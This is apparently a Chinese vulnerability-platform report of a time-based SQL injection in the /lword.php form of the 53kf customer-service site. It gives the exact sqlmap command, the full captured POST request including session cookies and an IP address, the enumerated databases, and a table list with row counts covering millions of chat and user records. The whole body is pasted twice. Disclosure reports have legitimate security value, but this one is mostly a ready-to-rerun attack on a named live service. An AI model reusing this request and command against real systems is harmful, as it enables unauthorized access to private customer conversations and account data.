### 简要描述:
RT
### 详细说明:
```
post注入语法:sqlmap.py -r 6.txt -D talk --count --tables 延迟注入慢的不行跑了25小时左右
======================数据包=========================
POST /lword.php HTTP/1.1
Host: www5.53kf.com
Proxy-Connection: keep-alive
Content-Length: 364
Origin: http://www5.53kf.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
CONTENT-TYPE: application/x-www-form-urlencoded
Accept: */*
Referer: http://www5.53kf.com/webCompany.php?arg=9004997&style=1
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: unique_ip_revisit70755185=1461192341; guest_id=10118457428009; land_page_72060147=http%3A%2F%2Fmall.lqxshop.com%2F; unique_ip_revisit72060147=1461358101; land_page_72032248=http%3A%2F%2Fwww.jyh.com%2F; unique_ip_72032248=115.214.46.134; unique_ip_revisit72032248=1461428941; _yd_=GA1.2.343522085.1461434523; Hm_lvt_3a5b4ba61a6b3219159606ddf5c41001=1461434523; Hm_lpvt_3a5b4ba61a6b3219159606ddf5c41001=1461434788; land_page_70865058=http%3A%2F%2Fwww.602.com%2Fkefu%2Fonlinekf%2F; hz6d_open_talk_70865058=1; guest_id=10118457428009; YGXSID=pt2qvomm1p99l0lgg7ui5ss6a2; customer_service_language=cn
action=import&company_id=70865058&tempid=53981272905&guest_id=10118457428009&referer=http://www.602.com/kefu/onlinekf/&referer1=&ly_mode=3&ly_object=&hasrobot=1&talk_his_table=talk_his_d51&message_table=message_d51&ly_name=111&ly_email=313131%40qq.com&ly_phone=13655555555&ly_qq=1&ly_company=111111&ly_check_num=ey46&ly_first=true&iscard=0&m_lyszc=on&ly_content=11
```
数据库信息
```
available databases [4]:
[*] information_schema
[*] ip
[*] talk
[*] test
```
当前库表信息
```
Database: talk
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| cus_user | 7587356 |
| chat_worker | 5445630 |
| message_d17 | 3731202 |
| statistic_mobile | 2441059 |
| message | 2298431 |
| message_d9 | 2148873 |
| message_d4 | 1988625 |
| message_d2 | 1808583 |
| message_d44 | 1777645 |
| stat_place | 1744358 |
| imessage | 1743501 |
| operate_log | 1593692 |
| message_d1 | 1487943 |
| message_d6 | 1474119 |
| message_d3 | 1385246 |
| message_d5 | 1314770 |
| message_d18 | 1126727 |
| quality_tj | 1044778 |
| message_d7 | 940082 |
| message_d42 | 910868 |
| message_d8 | 904577 |
| message_d51 | 826831 |
| message_d15 | 765361 |
| message_d29 | 678242 |
| message_d41 | 668929 |
| message_d37 | 657905 |
| talk_his_d17 | 639533 |
| talk_his_d4 | 629101 |
| talk_his | 586510 |
| cyy | 581547 |
| talk_his_d18 | 567066 |
| message_d21 | 555186 |
| company_config | 545814 |
| message_d23 | 528215 |
| message_d40 | 527550 |
| talk_his_d1 | 489171 |
| message_d25 | 483640 |
| message_d34 | 468168 |
| message_d26 | 457966 |
| msg_reply | 439597 |
| talk_his_d2 | 428249 |
| message_d19 | 428055 |
| message_d22 | 418819 |
| message_d43 | 393074 |
| message_d35 | 390498 |
| message_d10 | 387334 |
| link | 369830 |
| message_d12 | 369510 |
| sync_cus_user | 324439 |
| message_d47 | 315373 |
| message_d49 | 312978 |
| message_d11 | 312933 |
| message_d45 | 280488 |
| talk_his_d3 | 267285 |
| message_d39 | 252048 |
| message_d30 | 247659 |
| message_d27 | 245866 |
| worker_config | 241491 |
| message_d20 | 219202 |
| stat_to | 209362 |
| message_d13 | 206778 |
| talk_his_d40 | 195220 |
| talk_his_d19 | 188558 |
| message_d36 | 181096 |
| message_d38 | 173975 |
| message_d14 | 170788 |
| talk_his_d21 | 167693 |
| talk_his_d37 | 161604 |
| chat_nation | 159047 |
| file | 154214 |
| talk_his_d10 | 153588 |
| message_d24 | 150784 |
| talk_his_d23 | 145574 |
| talk_his_d29 | 134416 |
| talk_his_d22 | 126111 |
| talk_his_d15 | 120870 |
| message_d16 | 101893 |
| talk_his_d25 | 98135 |
| talk_his_d11 | 94796 |
| message_d33 | 90019 |
| talk_his_d27 | 89377 |
| talk_his_d39 | 89312 |
| block_user | 86269 |
| talk_his_d20 | 83174 |
| message_d28 | 80430 |
| talk_his_d26 | 77679 |
| message_d52 | 77008 |
| zsk_noanswer | 75277 |
| talk_his_d36 | 68745 |
| message_d53 | 67881 |
| cus_bill | 65664 |
| talk_his_d35 | 64107 |
| talk_his_d13 | 62955 |
| cyy_group | 61874 |
| message_d46 | 60569 |
| talk_his_d34 | 52756 |
| talk_his_d12 | 52166 |
| talk_his_d28 | 38660 |
| talk_his_d14 | 37929 |
| cus_web_msg | 37392 |
| message_d50 | 36374 |
| talk_his_d30 | 36115 |
| message_d32 | 34785 |
| worker | 34396 |
| talk_his_d24 | 32012 |
| talk_his_d38 | 29346 |
| talk_his_d16 | 25001 |
| message_d31 | 21752 |
| company_style | 20888 |
| company | 17999 |
| talk_his_d33 | 17473 |
| autoreply | 13039 |
| talk_his_d53 | 12826 |
| identity_role_id | 12765 |
| inner_identity | 12625 |
| module_new | 11552 |
| talk_his_d46 | 11188 |
| kfassign_group_worker | 10913 |
| sms_lword | 10441 |
| talk_his_d52 | 10123 |
| `identity` | 9942 |
| message_d48 | 9181 |
| talk_his_d32 | 9129 |
| worker_group | 7837 |
| kfassign_group | 7782 |
| talk_quality | 7514 |
| zsk_key | 6517 |
| temp_download_cus_user | 5921 |
| temp_download_statistic_nation | 4511 |
| temp_download_statistic_place | 4146 |
| talk_his_d31 | 3564 |
| talk_his_d50 | 3505 |
| talk_his_d41 | 3491 |
| zsk_question | 3319 |
| talk_his_d48 | 3249 |
| company_ad | 3140 |
| area_kf | 2819 |
| wechat_guest | 2388 |
| talk_theme | 1554 |
| weixin_config | 1417 |
| cus_theme | 1187 |
| zsk_category | 756 |
| temp_download_statistic | 705 |
| sms_config | 669 |
| robot_mem | 621 |
| temp_download_message | 526 |
| temp_download_chat_worker | 420 |
| cus_link | 362 |
| robot_hot | 258 |
| face | 256 |
| robot | 236 |
| cus_mail | 193 |
| temp_download_stat_place | 167 |
| cus_group | 157 |
| kf_group | 149 |
| email | 148 |
| logo | 144 |
| talk_weixin | 141 |
| temp_download_talk_his | 111 |
| mailqueue | 101 |
| image | 76 |
| company_tinet | 67 |
| chat_tables | 54 |
| wmenu | 46 |
| kf_group_newthing | 44 |
| temp_download_statistic_from | 44 |
| account_switch | 38 |
| temp_download_statistic_net | 26 |
| sys_notify | 24 |
| company_tinet_cno | 23 |
| kf_group_upload | 14 |
| daemonlog_recv | 11 |
| daemonlog_send | 11 |
| mail_template | 11 |
| wechat_robot_question | 8 |
| etel_logo | 6 |
| temp_download_worker | 6 |
| sph_counter | 2 |
| download_job | 1 |
| err_infos | 1 |
+--------------------------------+---------+
```
表字段 数据信息就不跑了吧
### 漏洞证明:
```
post注入语法:sqlmap.py -r 6.txt -D talk --count --tables 延迟注入慢的不行跑了25小时左右
======================数据包=========================
POST /lword.php HTTP/1.1
Host: www5.53kf.com
Proxy-Connection: keep-alive
Content-Length: 364
Origin: http://www5.53kf.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
CONTENT-TYPE: application/x-www-form-urlencoded
Accept: */*
Referer: http://www5.53kf.com/webCompany.php?arg=9004997&style=1
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: unique_ip_revisit70755185=1461192341; guest_id=10118457428009; land_page_72060147=http%3A%2F%2Fmall.lqxshop.com%2F; unique_ip_revisit72060147=1461358101; land_page_72032248=http%3A%2F%2Fwww.jyh.com%2F; unique_ip_72032248=115.214.46.134; unique_ip_revisit72032248=1461428941; _yd_=GA1.2.343522085.1461434523; Hm_lvt_3a5b4ba61a6b3219159606ddf5c41001=1461434523; Hm_lpvt_3a5b4ba61a6b3219159606ddf5c41001=1461434788; land_page_70865058=http%3A%2F%2Fwww.602.com%2Fkefu%2Fonlinekf%2F; hz6d_open_talk_70865058=1; guest_id=10118457428009; YGXSID=pt2qvomm1p99l0lgg7ui5ss6a2; customer_service_language=cn
action=import&company_id=70865058&tempid=53981272905&guest_id=10118457428009&referer=http://www.602.com/kefu/onlinekf/&referer1=&ly_mode=3&ly_object=&hasrobot=1&talk_his_table=talk_his_d51&message_table=message_d51&ly_name=111&ly_email=313131%40qq.com&ly_phone=13655555555&ly_qq=1&ly_company=111111&ly_check_num=ey46&ly_first=true&iscard=0&m_lyszc=on&ly_content=11
```
数据库信息
```
available databases [4]:
[*] information_schema
[*] ip
[*] talk
[*] test
```
当前库表信息
```
Database: talk
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| cus_user | 7587356 |
| chat_worker | 5445630 |
| message_d17 | 3731202 |
| statistic_mobile | 2441059 |
| message | 2298431 |
| message_d9 | 2148873 |
| message_d4 | 1988625 |
| message_d2 | 1808583 |
| message_d44 | 1777645 |
| stat_place | 1744358 |
| imessage | 1743501 |
| operate_log | 1593692 |
| message_d1 | 1487943 |
| message_d6 | 1474119 |
| message_d3 | 1385246 |
| message_d5 | 1314770 |
| message_d18 | 1126727 |
| quality_tj | 1044778 |
| message_d7 | 940082 |
| message_d42 | 910868 |
| message_d8 | 904577 |
| message_d51 | 826831 |
| message_d15 | 765361 |
| message_d29 | 678242 |
| message_d41 | 668929 |
| message_d37 | 657905 |
| talk_his_d17 | 639533 |
| talk_his_d4 | 629101 |
| talk_his | 586510 |
| cyy | 581547 |
| talk_his_d18 | 567066 |
| message_d21 | 555186 |
| company_config | 545814 |
| message_d23 | 528215 |
| message_d40 | 527550 |
| talk_his_d1 | 489171 |
| message_d25 | 483640 |
| message_d34 | 468168 |
| message_d26 | 457966 |
| msg_reply | 439597 |
| talk_his_d2 | 428249 |
| message_d19 | 428055 |
| message_d22 | 418819 |
| message_d43 | 393074 |
| message_d35 | 390498 |
| message_d10 | 387334 |
| link | 369830 |
| message_d12 | 369510 |
| sync_cus_user | 324439 |
| message_d47 | 315373 |
| message_d49 | 312978 |
| message_d11 | 312933 |
| message_d45 | 280488 |
| talk_his_d3 | 267285 |
| message_d39 | 252048 |
| message_d30 | 247659 |
| message_d27 | 245866 |
| worker_config | 241491 |
| message_d20 | 219202 |
| stat_to | 209362 |
| message_d13 | 206778 |
| talk_his_d40 | 195220 |
| talk_his_d19 | 188558 |
| message_d36 | 181096 |
| message_d38 | 173975 |
| message_d14 | 170788 |
| talk_his_d21 | 167693 |
| talk_his_d37 | 161604 |
| chat_nation | 159047 |
| file | 154214 |
| talk_his_d10 | 153588 |
| message_d24 | 150784 |
| talk_his_d23 | 145574 |
| talk_his_d29 | 134416 |
| talk_his_d22 | 126111 |
| talk_his_d15 | 120870 |
| message_d16 | 101893 |
| talk_his_d25 | 98135 |
| talk_his_d11 | 94796 |
| message_d33 | 90019 |
| talk_his_d27 | 89377 |
| talk_his_d39 | 89312 |
| block_user | 86269 |
| talk_his_d20 | 83174 |
| message_d28 | 80430 |
| talk_his_d26 | 77679 |
| message_d52 | 77008 |
| zsk_noanswer | 75277 |
| talk_his_d36 | 68745 |
| message_d53 | 67881 |
| cus_bill | 65664 |
| talk_his_d35 | 64107 |
| talk_his_d13 | 62955 |
| cyy_group | 61874 |
| message_d46 | 60569 |
| talk_his_d34 | 52756 |
| talk_his_d12 | 52166 |
| talk_his_d28 | 38660 |
| talk_his_d14 | 37929 |
| cus_web_msg | 37392 |
| message_d50 | 36374 |
| talk_his_d30 | 36115 |
| message_d32 | 34785 |
| worker | 34396 |
| talk_his_d24 | 32012 |
| talk_his_d38 | 29346 |
| talk_his_d16 | 25001 |
| message_d31 | 21752 |
| company_style | 20888 |
| company | 17999 |
| talk_his_d33 | 17473 |
| autoreply | 13039 |
| talk_his_d53 | 12826 |
| identity_role_id | 12765 |
| inner_identity | 12625 |
| module_new | 11552 |
| talk_his_d46 | 11188 |
| kfassign_group_worker | 10913 |
| sms_lword | 10441 |
| talk_his_d52 | 10123 |
| `identity` | 9942 |
| message_d48 | 9181 |
| talk_his_d32 | 9129 |
| worker_group | 7837 |
| kfassign_group | 7782 |
| talk_quality | 7514 |
| zsk_key | 6517 |
| temp_download_cus_user | 5921 |
| temp_download_statistic_nation | 4511 |
| temp_download_statistic_place | 4146 |
| talk_his_d31 | 3564 |
| talk_his_d50 | 3505 |
| talk_his_d41 | 3491 |
| zsk_question | 3319 |
| talk_his_d48 | 3249 |
| company_ad | 3140 |
| area_kf | 2819 |
| wechat_guest | 2388 |
| talk_theme | 1554 |
| weixin_config | 1417 |
| cus_theme | 1187 |
| zsk_category | 756 |
| temp_download_statistic | 705 |
| sms_config | 669 |
| robot_mem | 621 |
| temp_download_message | 526 |
| temp_download_chat_worker | 420 |
| cus_link | 362 |
| robot_hot | 258 |
| face | 256 |
| robot | 236 |
| cus_mail | 193 |
| temp_download_stat_place | 167 |
| cus_group | 157 |
| kf_group | 149 |
| email | 148 |
| logo | 144 |
| talk_weixin | 141 |
| temp_download_talk_his | 111 |
| mailqueue | 101 |
| image | 76 |
| company_tinet | 67 |
| chat_tables | 54 |
| wmenu | 46 |
| kf_group_newthing | 44 |
| temp_download_statistic_from | 44 |
| account_switch | 38 |
| temp_download_statistic_net | 26 |
| sys_notify | 24 |
| company_tinet_cno | 23 |
| kf_group_upload | 14 |
| daemonlog_recv | 11 |
| daemonlog_send | 11 |
| mail_template | 11 |
| wechat_robot_question | 8 |
| etel_logo | 6 |
| temp_download_worker | 6 |
| sph_counter | 2 |
| download_job | 1 |
| err_infos | 1 |
+--------------------------------+---------+
```
表字段 数据信息就不跑了吧
京公网安备 11010502034610号
暂无评论